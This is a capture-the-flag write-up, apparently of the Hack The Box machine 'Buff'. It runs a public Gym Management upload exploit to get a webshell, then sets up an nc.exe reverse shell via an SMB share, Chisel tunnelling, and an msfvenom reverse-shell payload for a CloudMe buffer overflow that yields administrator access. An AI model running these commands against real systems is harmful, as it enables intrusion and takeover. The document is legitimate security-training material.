One of the boxes I'd consider to be on the harder end out of the boxes I've done so far - not because of its sheer difficulty, but the fact that all PoCs required some sort of tinkering/troubleshooting from me.
Running an nmap scan first:
sudo nmap -sC -sV 10.129.2.18 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-title: mrb3n's Bro Hut |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
The machine hosting an Apache server utilizing PHP, and OpenSSL for encryption on a 64-bit Windows system. My first instinct was to searchsploit all three services, but coincidentally nothing of use was found.
There's nothing out of the ordinary at first - the webpage simply presents us with information regarding "mrb3n's Bro Hut" in all sections aside from Contact. The latter looks like this:
"mrb3n's Bro Hut - Made using Gym Management Software 1.0"
This on the other hand, has numerous exploits tied to its name...
searchsploit gym management -------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------- --------------------------------- Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt Gym Management System 1.0 - Unauthenticated Remote Code | php/webapps/48506.py GYM MS - GYM Management System - Cross Site Scripting ( | php/webapps/51777.txt -------------------------------------------------------- --------------------------------- Shellcodes: No Results
This allows us to either log onto the website, or execute code, leading to a reverse shell on the box. The remote code exploit documentation tells us that there's an /upload/ endpoint, where you can upload images. with a maliciously crafted payload, this can result in a webshell.
python exploit.py 'http://10.129.2.18:8080/'
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[*] Uploading payload...
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff/shaun
However, the connection isn't persistent, so getting the user flag is just a tad bit more difficult:
type \users\shaun\desktop\user.txt �PNG *flag*
Before getting to root, I want to try upgrading from the webshell, which I'll do with downloading nc.exe on the machine via an SMB share:
--- On my machine ---
cp /usr/share/windows-resources/binaries/nc.exe ./nc.exe
impacket-smbserver share . -smb2support
--- On shaun ---
C:\xampp\htdocs\gym\upload> copy \\10.10.15.8\share\nc.exe \users\shaun\nc.exe
�PNG
1 file(s) copied.
C:\xampp\htdocs\gym\upload> \users\shaun\nc.exe -e cmd 10.10.15.8
Of course, a listener on my machine was set up via nc -lvnp 4567 alongside running nc.exe on Buff.
Once this was done, I ran winPEAS - under TCP connections, I found something peculiar:
Enumerating IPv4 connections Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name ... TCP 127.0.0.1 8888 0.0.0.0 0 Listening 8688 CloudMe
This service seems to match what was inside of shaun's Downloads folder
C:\Users\shaun\Downloads>dir dir Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\Users\shaun\Downloads 14/07/2020 13:27. 14/07/2020 13:27 .. 16/06/2020 16:26 17,830,824 CloudMe_1112.exe 1 File(s) 17,830,824 bytes 2 Dir(s) 9,790,558,208 bytes free
If we searchsploit for CloudMe, some exploits seem to match the version number.
searchsploit cloudme ---------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------- --------------------------------- CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | windows/local/48499.txt CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py ... ---------------------------------------------- --------------------------------- Shellcodes: No Results
The PoC makes use of an msfvenom payload as a base, which can be modified to net a reverse shell (msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.15.8 LPORT=7654 -b '\x00\x0A\x0D' -f python -v payload). However, python is not installed on Buff. In order for the exploit to work from my machine, I set up a tunnel between the machines via Chisel. By default, that's not on the Windows machine either, so I set up the SMB share again.
Setting the tunnel up can be done in two steps:
Chisel runs as server on my machine on selected port
^
|
|
|
Chisel runs as client on victim machine and connects to mine
First I run chisel in server mode:
./lchisel server -p 3525 --reverse 2026/06/21 15:39:13 server: Reverse tunnelling enabled 2026/06/21 15:39:13 server: Fingerprint WZfY9BV6hXDieGH/UgZsKAYekt5JdWs5fXiDa23YyA4= 2026/06/21 15:39:13 server: Listening on http://0.0.0.0:3525
Then I run it in client mode from the victim machine:
chisel.exe client 10.10.15.8:3525 R:8888:localhost:8888 chisel.exe client 10.10.15.8:3525 R:8888:localhost:8888 2026/06/21 20:40:57 client: Connecting to ws://10.10.15.8:3525 2026/06/21 20:40:57 client: Connected (Latency 78.7018ms)
Once that's done, you can see the client being connected to my machine:
2026/06/21 15:40:56 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
All that's left is for me to set up a listener again, and run the exploit:
--- Terminal 1 --- nc -lnvp 7654 --- Terminal 2 --- python3 exploit.py
Following the exploit, I catch a shell finally:
Listening on 0.0.0.0 7654 Connection received on 10.129.2.18 49815 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami buff\administrator
Good luck to anyone else trying this box!